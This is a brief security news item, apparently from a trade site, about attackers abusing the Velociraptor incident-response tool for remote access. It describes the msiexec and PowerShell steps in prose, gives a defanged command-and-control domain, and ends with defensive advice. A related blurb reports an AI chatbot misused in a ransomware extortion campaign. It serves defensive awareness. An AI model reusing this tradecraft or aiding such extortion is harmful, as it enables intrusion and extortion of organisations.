Malware, Incident Response

Illicit remote access facilitated by Velociraptor incident response tool abuse

Open-source digital forensics and incident response tool Velociraptor has been exploited to remotely compromise a targeted network, GBHackers News reports. Threat actors leveraged the Windows msiexec utility to download another installer from a Cloudflare Workers domain, leading to Velociraptor deployment, according to an analysis from Sophos' Counter Threat Unit. After configuring Velociraptor to communicate with the 'velo[.]qaubctgg[.]workers[.]dev' command-and-control domain, attackers proceeded to download Visual Studio Code through a PowerShell command while installing another executable for persistence before invoking msiexec for further malware downloads. With illicit Velociraptor usage indicative of subsequent ransomware compromise, organizations should not only be wary of suspicious tunneling activity and service installations but also adopt endpoint detection and response systems to better examine potentially malicious actions, said Sophos CTU researchers. Organizations have also been urged to implement least-privilege principles and ensure potent backup systems to better counter intrusions.

Related

Anthropic’s Claude harnessed in data extortion scheme

Anthropic's Claude harnessed in data extortion scheme NBC News reports that at least 17 companies, including several healthcare providers, a financial entity, and a defense contractor, had been compromised and extorted as part of a ransomware attack campaign that involved the exploitation of Anthropic's Claude artificial intelligence chatbot.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

Related Terms

AdwareBoot Record InfectorComputer Emergency Response Team (CERT)Stimulus

You can skip this ad in 5 seconds